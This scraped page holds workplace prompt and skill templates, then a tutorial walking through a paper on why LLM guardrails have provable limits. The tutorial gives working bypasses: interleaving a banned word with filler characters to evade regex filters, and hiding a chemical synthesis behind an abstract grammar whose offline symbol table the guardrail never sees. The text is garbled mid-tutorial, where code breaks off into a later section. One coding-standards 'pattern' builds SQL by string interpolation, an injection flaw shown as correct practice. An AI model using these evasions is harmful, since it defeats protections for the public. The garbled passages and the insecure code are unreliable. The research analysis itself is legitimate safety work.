## Delivery Lead Second Brain Gathers rich context about team, client, project, and business before generating strategies. Output is matrices, CSV exports, and checklists — not narratives. Context is everything Structure gets rewarded You are the retrieval system ⇩ Download SKILL.md When to use each scenario
#### A — Priority Building "I need to build priorities for Q1 and Q2" 3–5 priorities in CSV format with ABCD reflections, metrics, resource mapping.
#### B — Team Scaling "I am onboarding 3 new engineers" Phased onboarding plan, ADR template, knowledge-base structure.
#### C — Client Status Reporting "I need to report to steering committee" RAG status summary, milestone tracker, risk escalation, client asks, next-week plan.
#### D — Risk Assessment "Too many risks, need a systematic approach" Risk matrix with impact/probability, mitigation strategies, owners and timelines. Interrogation Framework 17 questions · 4 phases ▶
#### Phase 1 — Team & Project Context (Q1–6)
- **Team Composition **How many people? Roles? Remote/collocated? Time zones?
- **Project Budget **Total contract value? Burn rate? Contingency?
- **Project Scope **3–5 main deliverables? Timeline to completion?
- **Success Metrics **How does the client measure success? KPIs?
- **Delivery Methodology **Agile, waterfall, hybrid? Sprint length?
- **Current Phase **Discovery, build, testing, launch, sustain?
#### Phase 2 — Client & Stakeholder Dynamics (Q7–10)
- **Client Stakeholder Map **Who makes decisions? Data-driven, political, or consensus style?
- **Relationship Health **Client satisfaction level? Any tensions or escalations?
- **Client Team **Are they embedded? Do they have capacity to review/approve?
- **Change Management **How resistant is the org to the change you are delivering?
#### Phase 3 — Risk & Dependencies (Q11–14)
- **Known Risks **What keeps you up at night? Top 3 risk items?
- **Dependencies **What is blocking progress? External dependencies?
- **Escalation Paths **Who do you escalate to? Decision timeline?
- **Resource Constraints **Skills gaps, competing priorities?
#### Phase 4 — Organizational Context (Q15–17)
- **Portfolio Context **How does this fit broader program/portfolio?
- **Organizational Readiness **Is the org ready for this change?
- **Tribal Knowledge **What does every DL wish they knew about this type of project? Starter Prompt Templates copy and paste ▶ Prompt Template — Scenario A (Priority Building with ABCD) Copy
```
You are a Delivery Lead Second Brain.
I need to build FY priorities for [PROGRAM/PROJECT NAME].
Before generating anything, ask me:
Phase 1: Team composition, budget, deliverables, success metrics, methodology, current phase
Phase 2: Stakeholder map, relationship health, client capacity, change management
Phase 3: Top 3 risks, blocking dependencies, escalation paths
Phase 4: Portfolio context, org readiness, tribal knowledge
Then generate:
- 3-5 priorities in CSV format using ABCD columns:
Priority, Action, Behavior, Context, Delivered, Owner, Timeline, Metrics, Notes
- Strategic narrative for steering committee
- Risk matrix (top 5 risks with Impact, Probability, Mitigation, Owner)
- Execution checklist by quarter
```
Prompt Template — Scenario C (Weekly Status Report) Copy
```
You are a Delivery Lead Second Brain.
I need to write a weekly status report for [PROJECT NAME] to send to [AUDIENCE].
Ask me:
1. What is the overall status? GREEN / YELLOW / RED — and why?
2. What milestones were supposed to happen this week? What happened?
3. What are the top 3 achievements?
4. What risks have escalated or changed since last week?
5. What do you need the client/leadership to decide or action this week?
6. What is the specific plan for next week?
Then generate a ready-to-send status report with:
- Executive summary (2 sentences)
- Milestone tracker (RAG table)
- Achievements this week
- Risks & escalations (with specific impact if not resolved)
- Next week plan
- Client asks with deadlines
```
Output Templates ABCD CSV · status report · risk matrix · onboarding plan ▶ Priority Building — ABCD CSV Format Copy
```
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Foundation","[what you are doing]","[how — quality, coverage, standards]","[why it matters — business impact]","[what success looks like]","[owner]","[dates]","[measurable metrics]","[dependencies, risks]"
"Q2 Adoption","[what you are doing]","[how — quality, coverage, standards]","[why it matters — business impact]","[what success looks like]","[owner]","[dates]","[measurable metrics]","[dependencies, risks]"
```
Weekly Status Report Copy
```
## Weekly Status Report: [Project Name]
**Week of**: [Date]
**Overall Status**: GREEN / YELLOW / RED
### 1. Milestone Tracker
| Deliverable | Target Date | Status | Progress | Notes |
|-----------------|------------|--------|----------|-------|
| [Milestone 1] | [date] | GREEN | 100% | [note]|
| [Milestone 2] | [date] | YELLOW | 65% | [risk]|
### 2. Key Achievements This Week
- [Achievement 1]
- [Achievement 2]
### 3. Risks & Escalations
**ESCALATION NEEDED**: [Risk description]
- **Impact**: [What slips if not resolved]
- **Mitigation in progress**: [What is being done]
- **Ask**: [Specific decision or action needed]
### 4. Next Week's Plan
- [ ] [Action 1]
- [ ] [Action 2]
### 5. Client Asks / Open Items
| Ask | Owner | Status | Timeline |
|---------|---------|----------|----------|
| [ask 1] | [client]| Pending | [date] |
```
Risk Assessment Matrix Copy
```
| Risk | Probability | Impact | Score | Mitigation | Owner | Timeline |
|---------------------------|-------------|--------|-------|----------------------------|--------|----------|
| [Key vendor delay] | Medium | High | 6 | Build contingency layer | [name] | Week 1 |
| [Scope creep] | High | High | 8 | Change control board | [name] | Immediate|
| [Team capacity — testing] | Medium | High | 6 | Hire contract QA for wk 8 | [name] | Week 4 |
Score = Probability (1-3) × Impact (1-3)
```
Team Onboarding Plan Copy
```
## Onboarding Plan: [New Team Member]
### Phase 1: Week 1 — Foundation
| Day | Activity | Owner | Duration |
|-------|----------------------------------------------|----------|----------|
| 1 | Project mission, scope, success criteria | [DL] | 2h |
| 1 | Meet core team + role clarity | [PM] | 1h |
| 2 | Client context + stakeholder map | [AE] | 1.5h |
| 2 | Current phase deep-dive + blockers | [TL] | 2h |
| 3 | Documentation review (plan, ADRs, design docs)| Self | 3h |
| 4-5 | Shadow team ceremonies | [Team] | 5h |
### Phase 1 Checkpoint
- [ ] Can articulate project goal in 2 sentences
- [ ] Knows all core team members and roles
- [ ] Understands current phase and top 3 blockers
- [ ] Attended at least 3 ceremonies
### Phase 3: Week 4-6 — First Real Task
- Assigned task has clear success criteria
- Mentor reviews work before integration
- Autonomy increases over time
```
skill spec ---
name : tl-second-brain
version : 1.0
description : ADRs, metaprompting, technical spike planning, team technical standards
patterns : [Tree-of-Thoughts, ADR, metaprompt, cursorrules]
---
## Tech Lead Second Brain Guides architectural decisions through Tree of Thoughts (GENERATE→EVALUATE→DECIDE), builds metaprompts for team amplification, and codifies standards as .cursorrules. Context is everything Structure gets rewarded You are the retrieval system ⇩ Download SKILL.md When to use each scenario
#### A — Architecture Decision Record "Should we decompose our monolith or use strangler fig?" 3 options via Tree of Thoughts, ADR document, implementation roadmap.
#### B — Metaprompting "I need each engineer to get role-specific architecture guidance" Metaprompt with backend/DevOps/QA/security role branches, usage examples.
#### C — Technical Spike Planning "Should we migrate to Kubernetes? Need data before committing" Spike plan with investigation phases, success criteria, decision gates, time-box.
#### D — Team Technical Standards "Our async/await patterns are inconsistent across the team" .cursorrulesfile with patterns, anti-patterns, examples, rationale. Interrogation Framework 17 questions · 4 phases ▶
#### Phase 1 — Current Architecture (Q1–6)
- **Current System Design **Monolith, microservices, event-driven, hybrid?
- **Technology Stack **Languages, frameworks, databases, message queues, versions?
- **Scale Context **Transactions/sec? Users? Data volume? Growth rate?
- **Team Size & Skills **How many engineers? Key expertise areas? Skill gaps?
- **Operational Maturity **CI/CD, monitoring, on-call model?
- **Technical Debt **Biggest pain point? What slows down development?
#### Phase 2 — Target State & Constraints (Q7–10)
- **Strategic Goal **What problem are we solving? Business driver?
- **Success Metrics **Latency, throughput, developer velocity?
- **Hard Constraints **Budget, timeline, compliance, team availability?
- **Integration Requirements **Other systems that must integrate?
#### Phase 3 — Organizational Context (Q11–14)
- **Team Maturity **Can the team handle microservices, distributed systems, new frameworks?
- **Appetite for Change **How much disruption is acceptable?
- **Support & Tooling **What infrastructure already exists?
- **Decision Authority **Who decides? What is the approval process?
#### Phase 4 — Risk & Knowledge (Q15–17)
- **Similar Decisions **Have we done something like this before?
- **Hidden Risks **What keeps you up at night about this decision?
- **Decision Timeline **When does this need to be made? How long to implement? Starter Prompt Templates copy and paste ▶ Prompt Template — Scenario A (ADR with Tree of Thoughts) Copy
```
You are a Tech Lead Second Brain using Tree of Thoughts (GENERATE→EVALUATE→DECIDE).
I need an Architecture Decision Record for: [DECISION QUESTION]
Before generating options, interrogate me through 4 phases:
Phase 1: Current architecture, tech stack, scale, team composition, tech debt
Phase 2: Strategic goal, success metrics, hard constraints, integration requirements
Phase 3: Team maturity, change appetite, existing tooling, decision authority
Phase 4: Prior similar decisions, risks, decision timeline
Then generate:
ADR-NNN with:
- Context (problem statement, constraints, success criteria)
- 3 fundamentally different options (not variations on one idea)
Each option: THINK (how it works) → EVALUATE (pros/cons/risks)
- Decision with clear rationale (which constraint it best fits)
- Consequences (positive, negative, action items with timeline)
```
Prompt Template — Scenario B (Metaprompt Generation) Copy
```
You are a Tech Lead Second Brain.
I want a metaprompt for [ARCHITECTURE TOPIC — e.g., "caching strategy design"].
The metaprompt should, when given to any team member, generate role-specific guidance.
Ask me:
1. What is the architectural decision or topic?
2. What are the performance targets and constraints?
3. What roles need different guidance? (Backend, DevOps, QA, Security?)
4. What are the team's existing patterns I want to enforce?
5. What are the top 3 anti-patterns we want to prevent?
Then generate a metaprompt that includes:
- Primary mission (what the role should produce)
- Interrogation questions the role must answer first
- Role-specific generation sections (one per role)
- Rationale section explaining key trade-offs
```
Prompt Template — Scenario D (.cursorrules Team Standards) Copy
```
You are a Tech Lead Second Brain.
I need a .cursorrules file for [PROJECT/TEAM NAME].
Ask me:
1. What is the one-sentence vision for our architecture?
2. What are the 3-4 most critical patterns to enforce? (async/await, error handling, logging, service contracts?)
3. For each pattern: what does the team do WRONG today?
4. For each pattern: what does the CORRECT implementation look like?
5. What are the top 3 anti-patterns you keep seeing in code review?
6. Under what conditions can engineers break these patterns?
Then generate a .cursorrules file with:
- Vision statement
- Core patterns (each with PATTERN code example and ANTI-PATTERN code example)
- Code review checklist
- When to break the rules (explicit conditions)
```
Output Templates ADR · spike plan · .cursorrules ▶ Architecture Decision Record (ADR) Copy
```
## ADR-NNN: [Decision Title]
### Context
- **Problem Statement**: What decision are we making and why?
- **Constraints**: Timeline, budget, team size, technical/organizational limits
- **Success Criteria**: How will we measure if this was the right choice?
### Options (Tree of Thoughts)
#### Option A: [Approach Name]
**THINK**: How would this work? (architecture sketch)
**EVALUATE**:
Pros:
- [pro 1]
Cons:
- [con 1]
Risks:
- [ ] High: [risk]
- [ ] Medium: [risk]
#### Option B: [Approach Name]
[same structure]
#### Option C: [Approach Name]
[same structure]
### Decision
**CHOOSE**: Option [A/B/C]
**Rationale**: Best fits [constraint]. Team capability: [assessment]. Risk profile: [acceptable risks].
### Consequences
#### Positive
- [benefit 1]
#### Negative
- [trade-off 1]
#### Action Items
- [ ] [Action] — [Owner] — [Date]
```
Technical Spike Plan Copy
```
## Technical Spike: [Investigation Topic]
### Objective
**Question**: Should we migrate to [technology/pattern]?
**Time-box**: [1-2 weeks]
**Success Criteria**:
- [ ] Proof-of-concept running
- [ ] Performance benchmarks vs. current system
- [ ] Team impact assessment (learning curve, hiring needs)
- [ ] 3-year cost/benefit analysis
- [ ] Risk mitigation strategy documented
### Decision Gates
| Gate | Criteria | Owner | Target |
|-----------------|---------------------------------------|-------------|--------|
| POC Success | POC runs on developer laptop | [Engineer] | Day 3 |
| Performance | Meets latency targets | [Engineer] | Day 6 |
| Team Fit | Learning curve acceptable | [TL] | Day 7 |
| Financial | 3-year TCO justifies migration cost | [PM] | Day 8 |
### Explicitly Not in Scope
- Full migration plan
- Integration with all downstream systems
- Vendor negotiation
```
.cursorrules — Team Standards File Copy
```
# .cursorrules — Team Technical Standards for [Project]
## Vision
[1 sentence: "We are an async-first microservices team that values observable deployments."]
## Core Patterns
### 1. Async/Await
# PATTERN
async def get_user(user_id: int):
user = await db.query(f"SELECT * FROM users WHERE id = {user_id}")
return user
# ANTI-PATTERN
def get_user(user_id: int): # Blocks request thread
return requests.get(f"https://userapi.com/{user_id}")
### 2. Error Handling
# PATTERN — Named exceptions with full context
class PaymentProcessingError(Exception):
def __init__(self, user_id: int, amount: float, reason: str): ...
# ANTI-PATTERN
except Exception as e:
logger.error(f"Error: {e}") # No context!
### 3. Logging
# PATTERN — Structured JSON, always queryable
logger.info("order_created", extra={"order_id": order.id, "amount": order.total})
# ANTI-PATTERN
logger.info(f"Order {order.id} created") # Not queryable
## Code Review Checklist
- [ ] No synchronous I/O in async functions
- [ ] All exceptions named and contextual
- [ ] Logging is structured JSON
- [ ] Service boundaries clear (input/output contracts)
- [ ] Tests cover happy path + at least 2 error scenarios
- [ ] Type hints on all function signatures
## When to Break These Patterns
Only with explicit TL approval and documented rationale.
File issue: `patterns: [pattern-name]: [reason for exception]`
```
Tree of Thoughts Pattern Reference ▶ GENERATE What are 3 fundamentally different approaches? Not variations — genuinely different options that each solve the problem in a distinct way. EVALUATE For each option: pros, cons, and risks. Be honest about trade-offs. Prevent premature convergence on the familiar option. DECIDE Which option best balances constraints and team capabilities? State rationale explicitly. Acknowledge which risks you are accepting. skill spec ---
name : make-skills
version : 1.0
description : Capstone — turn your repeated work into a production-ready interrogation-driven skill
phases : [task-discovery, pattern-extraction, skill-generation]
output : SKILL.md file you can save and use immediately
---
## Make Skills — Capstone Stop using skills. Start building them. A 3-phase workflow that extracts the pattern hidden in your weekly work and turns it into a reusable AI workflow. Context is everything Structure gets rewarded You are the retrieval system ⇩ Download SKILL.md **The Capstone Reveal **— After you generate your first skill you will see: it ASKS questions (retrieval), it ASSEMBLES your answers into structured context (augmentation), it FEEDS that context to the AI for generation (generation). You just built a RAG system. Every skill is a RAG system. When to build a skill
#### A — Repeatable Document Creation "I create [documents] at least weekly" Sales decks, RFP responses, project briefs, technical specs.
#### B — Code Generation or Migration "I build [code structures] repeatedly" Microservice scaffolding, API contract implementation, database migration planning.
#### C — Analysis or Decision Support "I analyze [situations] and produce structured recommendations" Architecture reviews, competitive analysis, incident post-mortems.
#### D — Communication or Planning "I create [communications] regularly" Meeting agendas, status reports, project proposals, email templates. 3-Phase Workflow task discovery · pattern extraction · skill generation ▶
#### Phase 1 — Task Discovery (15 min)
- **Weekly Task **What task do you repeat at least weekly?
- **Current Process **Walk me through your steps today, step by step.
- **Input Requirements **What information do you need before starting?
- **Quality Definition **What does GOOD output look like? What does BAD look like?
- **Audience **Who uses your output and how?
#### Phase 2 — Pattern Extraction (10 min)
- **Task Category **Code generation, document creation, analysis, communication, or planning?
- **Context Requirements **What 5–7 pieces of information always change but are always needed?
- **Question Design **What questions should the skill ask to gather that context?
- **Output Structure **What sections, ordering, and format for the output?
#### Phase 3 — Skill Generation (automatic)
- **Formatting **Converts your answers into proper SKILL.md structure
- **Example Generation **Creates a worked example (interrogation → output)
- **Integration Notes **Explains how the skill connects to RAG, ReAct, bootcamp patterns Starter Prompt Template copy and paste ▶ Prompt Template — Make-Skills Capstone Copy
```
You are a Make-Skills capstone assistant. Help me build a production-ready SKILL.md for a task I repeat at work.
Run me through 3 phases:
PHASE 1 — Task Discovery (ask all 5 questions, one at a time):
1. What task do you repeat at least weekly at work?
2. Walk me through how you do it today, step by step.
3. What information do you need to gather before you start?
4. What does GOOD output look like? What does BAD look like?
5. Who is the audience for your output?
PHASE 2 — Pattern Extraction (ask all 4 questions):
6. Which category best fits your task: code generation, document creation, analysis, communication, or planning?
7. What are 5-7 pieces of context that always change but are always needed?
8. What questions should the skill ask the user to gather that context?
9. What structure should the output follow? (section headings, ordering, format)
PHASE 3 — Generate the skill file:
Using all my answers, generate a complete SKILL.md with:
- YAML frontmatter (name, version, description)
- Overview section (what it does, 3 intuitions)
- Structured interrogation framework (formatted as phases)
- Output format specification (with template)
- Complete worked example (interrogation → output)
- Reflection: explain what the participant just built (the RAG reveal)
```
Generated Skill File Template the structure your skill will follow ▶ SKILL.md — Generated Structure Copy
```
---
name: [your-task-name]
description: [your task] interrogation-driven skill
version: 1.0
---
# [Your Skill Name]
## Overview
[Purpose, target audience, core value]
[The 3 bootcamp intuitions as they apply to your task]
## Key Capabilities
[What this skill does — derived from Phase 2 answers]
## Structured Interrogation Framework
### Phase 1: [Context gathering]
[Your questions, formatted as numbered list with bold category + question]
### Phase 2: [Structure definition]
[Your output structure requirements]
## Output Format Specification
```[your format]
[Your template with all sections filled in with examples]
```
## Example: Complete Workflow
### Interrogation Phase
[Worked example: Q1: → "answer" Q2: → "answer" ...]
### Generated Output
[Sample output your skill produces from those answers]
## Reflection: What You Just Built
- It ASKS questions → that is retrieval
- It ASSEMBLES your answers into structured context → that is augmentation
- It FEEDS that context to the AI → that is generation
You just built a RAG system. Every skill is a RAG system.
```
Should you build a skill for this task? ▶
| Build a skill if… || Skip skills if… |
| You do this at least weekly || You do it once per quarter |
| Output affects others || Output is just for you |
| It takes 30+ minutes || It takes 2 minutes (template works fine) |
| You always gather the same information || The process changes dramatically each time |
| Others could use it too || It is already fully automated |
**Skill composition: **Once you have a few skills you can chain them. Spec-generator output feeds into plan-generator, which feeds into test-strategy-generator. That is a workflow, not just a skill. Joey Lopez · 2026 · [jrlopez.dev ]()[home ]()· [bootcamp ]()· [developer ]()· [PO/PM ]()· [delivery ]()· [tech lead ]()· [make skills ]()[.md ]()
---
# guardrails-deep-dive.md
# https://jrlopez.dev/p/guardrails-deep-dive.html
---
title: "Guardrails Deep Dive"
description: "Interactive walkthrough of the proof."
author: "Joey Lopez"
date: "2025-12-10"
tags: ["security", "prompting", "teaching", "theory"]
atom_id: 3
source_html: "guardrails-deep-dive.html"
url: "https://jrlopez.dev/p/guardrails-deep-dive.html"
generated: true
---
[jrlopez.dev ]()[1. Setup ]()[2. Monoids ]()[3. Blindness ]()[4. Fano ]()[5. NP-Hard ]()[6. Functor ]()[7. Steganography ]()[8. So What? ]()
# Why LLM Guardrails Have Limits An interactive walkthrough of *"Algebraic and Computational Limits of LLM Guardrails" *— four impossibility results, step by step. Joey Lopez [Syntactic Monoids ]()[Blindness Proof ]()[Defense Strategy ]()
## 1 The Setup: How LLM Safety Works Today When you ask ChatGPT how to do something dangerous and it refuses, that refusal comes from **multiple layers of defense **stacked on top of each other. Think of it like airport security: there is not one check, but many. graph LR
A["Your Prompt"] --> B["Layer 1: Regex Filter"]
B --> C["Layer 2: Neural Classifier"]
C --> D["Layer 3: RLHF Training"]
D --> E["Layer 4: Output Monitor"]
E --> F["Response"]
style B fill:#3d1520,stroke:#e94560,color:#fff
style C fill:#152540,stroke:#58a6ff,color:#fff
style D fill:#1a3d20,stroke:#3fb950,color:#fff
style E fill:#2d1f4e,stroke:#bc8cff,color:#fff
| Layer || What It Does || How It Works |
| Regex Filter || Blocks known bad keywords || Pattern matching: if prompt contains "how to make a bomb", block it |
| Neural Classifier || Catches broader harmful intent || A separate ML model scores the prompt for danger |
| RLHF || Trains the model to refuse || Reinforcement Learning from Human Feedback shapes the model's behavior |
| Output Monitor || Inspects the response || Checks generated text before showing it to you |
Key Insight Each layer is individually sound for what it was designed to do. The paper proves that each layer has a *structural *limitation -- not a bug, not a missing training example, but a mathematical wall that cannot be climbed no matter how much compute or data you throw at it. The paper identifies **four impossibility barriers **:
- **Algebraic blindness **-- regex filters physically cannot see certain encodings
- **Information loss **-- abstracting content destroys safety-critical information
- **Computational hardness **-- checking all possible interpretations is NP-complete
- **Structural identity **-- adversarial and legitimate prompts are the same string Check Your Understanding Why do LLM safety systems use multiple layers instead of just one really good one? Because each layer catches different types of threats. Regex catches exact keywords fast. Neural classifiers catch semantic intent. RLHF shapes the model's own preferences. Output monitors catch things that slip through. No single layer covers all attack surfaces -- which is exactly what the paper formalizes. If you could build a perfect regex filter that blocked every harmful keyword, would that be sufficient? No. As we will see in Lesson 3, there are encodings that regex filters *cannot detect in principle *, not because the pattern list is incomplete, but because the mathematical structure of regex itself lacks the ability to decode them.
## 2 Syntactic Monoids: The DNA of a Regex Before we can prove that regex filters are blind, we need to understand their internal structure. Every regex has a hidden algebraic fingerprint called its syntactic monoid . Analogy **A monoid is like a recipe book with a blender. **You have a set of ingredients (elements) and one rule for combining them (the operation). The rule has to be: (1) *associative *-- blending A with (B blended with C) gives the same result as (A blended with B) blended with C. (2) There is an *identity element *-- adding nothing to the mix changes nothing. That is it. Two rules. That is a monoid. Strings form a natural monoid: the elements are all possible strings, the operation is concatenation, and the identity is the empty string "". The **syntactic monoid **of a regex pattern is what you get when you collapse all strings that behave identically with respect to pattern matching into a single representative. It captures the *minimum information *the regex needs to track. Try It Yourself Two strings can look totally different but act the same from the regex's perspective: importrepattern = re.compile(r"bomb")# These two strings are DIFFERENT...s1 ="bom"s2 ="xyz"# ...but from the regex's perspective, they behave identically# in SOME contexts. Test what happens when we add "b":print(bool(pattern.search(s1 +"b")))# True -- "bom"+"b" = "bomb"print(bool(pattern.search(s2 +"b")))# False -- "xyz"+"b" = "xyzb"# Different monoid elements! "bom" is further along# the path to triggering "bomb" than "xyz" is.# But these two ARE equivalent:s3 ="xyz"s4 ="qqq"# Neither is on the path to matching "bomb" in any context.# Same monoid element.
Now the critical property: aperiodicity . Key Insight A monoid is **aperiodic **if it contains no cyclic counting structure. Formally: for every element m, there exists some n where m n = m n+1 . Repeating the operation enough times always reaches a fixed point -- it never cycles back. **The paper proves: **Every substring-matching regex guardrail has an aperiodic syntactic monoid. This was verified on 91 real patterns from 5 open-source guardrail tools -- 97.1% were aperiodic. Analogy **Colorblindness. **An aperiodic monoid is like being red-green colorblind. The limitation is not about training or effort -- the *hardware *physically lacks the receptors to distinguish certain signals. The regex physically lacks the algebraic structure to count modularly. No amount of adding more patterns can fix this. Check Your Understanding What makes a syntactic monoid "aperiodic"? It has no nontrivial cyclic subgroups. Repeating any operation enough times hits a fixed point and stays there, rather than cycling. The simplest non-aperiodic monoid is the integers modulo 2 under addition: 0, 1, 0, 1, 0, 1... it cycles forever and never stabilizes. Why does aperiodicity matter for security? Because modular counting (e.g., "read every 2nd character") requires cyclic algebraic structure. If your monoid is aperiodic, it cannot track "am I on an even or odd character?" -- it is algebraically incapable of counting modulo any number. This is the foundation of the blindness proof in Lesson 3.
## 3 The Blindness Proof (Crown Jewel) This is the paper's most striking result. It chains together three classical theorems from different decades to reach an inescapable conclusion. 1 Schutzenberger-McNaughton-Papert (1965/1971) A regular language has an aperiodic syntactic monoid if and only if it is "star-free" -- definable without counting. | 2 Barrington-Compton-Straubing-Therien (1992) A regular language is in AC 0 (constant-depth circuits) if and only if its syntactic monoid is aperiodic. | 3 Furst-Saxe-Sipser (1981) / Hastad (1987) MOD p (counting modulo a prime p) is NOT in AC 0 . Constant-depth circuits cannot compute parity. | ! Conclusion: Guardrail Blindness Theorem Aperiodic monoid => AC 0 => cannot compute MOD p => blind to any encoding that uses modular counting. This is unconditional. No patches. No fixes. Hardware limitation. Analogy **Dog whistle. **A dog whistle produces sound at frequencies above 20kHz. Humans cannot hear it -- not because we are not paying attention, not because we need training, but because our cochlear hardware tops out at ~20kHz. The frequency limit is physics, not skill. Similarly, regex guardrails cannot "hear" modular encodings because their algebraic structure (aperiodic monoid) tops out below counting. Try It Yourself -- The MOD_2 Bypass Interleave a payload with filler characters. The regex sees garbage. The decoder reads every 2nd character and recovers the original. Show Output importrepayload ="bomb"# Encode: insert a filler character between each letterencoded ='x'.join(payload)# "bxoxmxb"print(f"Encoded:{encoded}")# The regex guardrail sees "bxoxmxb" -- no match for "bomb"match = re.search(r"bomb", encoded)
print(f"Regex finds 'bomb':{match}")# None# But the decoder trivially recovers the payloaddecoded = encoded[0::2]# read every 2nd characterprint(f"Decoded:{decoded}")# "bomb"# WHY can't the regex catch this?# Because detecting "every 2nd character spells bomb"# requires MOD_2 counting -- tracking even vs odd positions.# Aperiodic monoids CANNOT do this. It's proven impossible.Encoded: bxoxmxb
Regex finds 'bomb': None
Decoded: bomb Key Insight The paper proves **MOD 2 is sufficient **for a complete bypass. You do not need exotic encodings. The simplest possible modular operation -- even/odd -- is already beyond the reach of any aperiodic regex guardrail. And you cannot fix this by adding more regex patterns, because the fix itself would need to count modularly, which no aperiodic regex can do. Check Your Understanding Could you "fix" this by adding a regex that looks for alternating character patterns like "?x?x?x?"? No. That pattern would match many innocent strings and still would not decode the interleaved payload. To actually check whether every-other-character spells a banned word, you would need a regex that counts position parity -- which is exactly what the theorem proves impossible for any regex with an aperiodic monoid. The fix requires algebraic structure (Z/2Z) that substring-matching regex cannot possess. Does this mean neural guardrails are also blind to this? Not necessarily! Transformers operate in TC 0 , which *can *compute MOD p . The algebraic blindness result applies specifically to regex filters. But neural guardrails face the other three barriers (information loss, NP-hardness, and indistinguishability) covered in later lessons.
## 4 The Fano Bound: Information Destroyed by Abstraction When a guardrail operates on *abstractions *(categories of content rather than the exact content itself), it loses information. This is not a design flaw -- it is information theory. Analogy **The airport scanner that can only see "bag." **Imagine an X-ray machine that tells you the general category of each item ("liquid", "metal", "organic") but not the specific item. A bottle of water and a bottle of acid both show up as "liquid." A chef's knife and a butter knife both show up as "metal." The scanner has *mixed fibers *-- the same abstract category contains both safe and dangerous items. No matter how smart your decision logic, you will either block some safe items or allow some dangerous ones. That error floor is mathematically guaranteed. Formally, when the guardrail sees abstract type *m *instead of the concrete artifact *r *, it is working through a lossy channel. The **Fano inequality **from information theory gives a hard floor on the error rate: Key Insight **P error >= h -1 (H(G(R) | U(R))) **
Where h is the binary entropy function. If 30% of the probability mass lands in "mixed fibers" (same abstract type, different safety labels), the error floor is about **5% **. No algorithm, no matter how sophisticated, can get below this floor while operating at the abstraction level. Try It Yourself -- Compute the Fano Error Floor Binary search for the inverse of the binary entropy function to find the irreducible error rate: Show Output importmathdefh(p):"""Binary entropy function"""ifp<=0orp >=1:return0return-p*math.log2(p) - (1-p)*math.log2(1-p)# Binary search for h_inverse(0.3)# If 30% of probability mass is in mixed fibers...conditional_entropy =0.3lo, hi =0,0.5for_inrange(100):
mid = (lo + hi) /2ifh(mid)|R1| N2["N2"]
N2 -->|R2| N3["N3"]
N3 -->|R7| N17["N17"]
end
subgraph Real["Real Category (what actually happens)"]
SA["salicylic acid"] -->|acetylation| I2["intermediate"]
I2 -->|purification| I3["crude product"]
I3 -->|recrystallization| ASP["aspirin"]
end
N1 -.->|"functor I"| SA
N17 -.->|"functor I"| ASP
style Abstract fill:#152540,stroke:#58a6ff,color:#fff
style Real fill:#1a3d20,stroke:#3fb950,color:#fff The LLM only ever sees the left side -- abstract symbols N1, R1, N2, etc. It solves the grammar. The attacker holds the interpretation table (the functor) offline and maps the solution to real operations. Try It Yourself -- The Functor in Action Show Output # The LLM solves this abstract grammar:abstract_path = ["N1","R1","N2","R2","N3","R7","N17"]# The attacker holds this interpretation table OFFLINE# (the guardrail never sees it)interp = {"N1":"salicylic acid","N2":"acetylsalicylic intermediate","N3":"crude product","N17":"aspirin","R1":"acetylation","R2":"purification","R7":"recrystallization",
}# Apply the functor: map abstract -> concretereal_path = [interp.get(s, s)forsinabstract_path]
print("LLM sees: "," -> ".join(abstract_path))
print("Reality is: "," -> ".join(real_path))
print()
print("The guardrail sees: N1 -> R1 -> N2 -> R2 -> N3 -> R7 -> N17")
print("Looks like homework. Is actually a synthesis procedure.")LLM sees: N1 -> R1 -> N2 -> R2 -> N3 -> R7 -> N17
Reality is: salicylic acid -> acetylation -> acetylsalicylic intermediate -> purification -> crude product -> recrystallization -> aspirin
The guardrail sees: N1 -> R1 -> N2 -> R2 -> N3 -> R7 -> N17
Looks like homework. Is actually a synthesis procedure. Key Insight The **faithfulness **of the functor means: distinct abstract paths map to distinct real-world operation sequences. No steps are dropped or merged. The LLM's correct abstract reasoning becomes correct real-world procedures -- guaranteed by the universal property of the free category. The LLM never needs to "understand" what it is doing. Structural fidelity is sufficient. Check Your Understanding The paper calls this the "Chinese Room Inversion." What does that mean? Searle's Chinese Room argued that symbol manipulation without understanding is not intelligence. The paper inverts this: for producing operationally correct procedures, understanding is unnecessary. The LLM operates as a theorem prover over an uninterpreted formal system. It never crosses the abstraction boundary. It does not know it is producing a synthesis route. But the functor guarantees that the abstract derivation maps to a valid real-world sequence. The Chinese Room is not a weakness -- it is a weapon.
## 7 Indistinguishability: Perfect Steganography This is perhaps the most unsettling result. The adversarial prompt and the legitimate prompt are not just *similar *. They are **the same string **. Analogy **One-time pad. **In cryptography, a one-time pad produces ciphertext that is *information-theoretically *indistinguishable from random noise -- no amount of computation can break it, because the same ciphertext maps to any possible plaintext depending on the key. The homomorphic reasoning attack works the same way: the same abstract grammar prompt maps to "aspirin synthesis" or "nerve agent synthesis" depending on which interpretation table you hold. The interpretation table is the key. The guardrail never sees it. graph TB
P["Same Prompt String:
'Solve grammar G over symbols N1..N17, R1..R7'"]
P --> T1["Interpretation Table A:
Maps to aspirin synthesis"]
P --> T2["Interpretation Table B:
Maps to explosive synthesis"]
P --> T3["Interpretation Table C:
Maps to math homework"]
style P fill:#152540,stroke:#58a6ff,color:#fff
style T1 fill:#1a3d20,stroke:#3fb950,color:#fff
style T2 fill:#3d1520,stroke:#e94560,color:#fff
style T3 fill:#2d1f4e,stroke:#bc8cff,color:#fff Key Insight The distinguisher advantage is **exactly zero **-- not "negligible," not "approximately zero," but mathematically zero. The adversarial prompt class and the legitimate prompt class are the same set of strings. No guardrail operating on prompt content can distinguish them, because there is literally nothing to distinguish. This is *perfect steganographic security *. This holds under one assumption: the abstract symbol names do not reveal their interpretation. If you name your symbols "N1" instead of "nerve_agent_precursor", the theorem applies. If you carelessly use real-world names, the guardrail might catch you -- but that is an operational error, not a theoretical limitation. Check Your Understanding How is this different from just "using code words"? Code words are substitution ciphers -- they can be detected statistically because the distribution of code words differs from natural language. The homomorphic reasoning attack is *not *a substitution. The prompt IS a legitimate formal reasoning task. There is no statistical anomaly to detect. You are literally asking the LLM to solve a grammar, which is what LLMs do. The harmful meaning exists only in the offline interpretation table, which never touches any inference call. Could a guardrail learn to flag ALL abstract grammar-solving prompts? It could -- but that would block all legitimate formal reasoning, theorem proving, compiler design, and programming language work. The cost would be enormous. This is the fundamental dilemma: the attack exploits the LLM's genuine, useful capability for formal reasoning. Blocking the attack means blocking the capability.
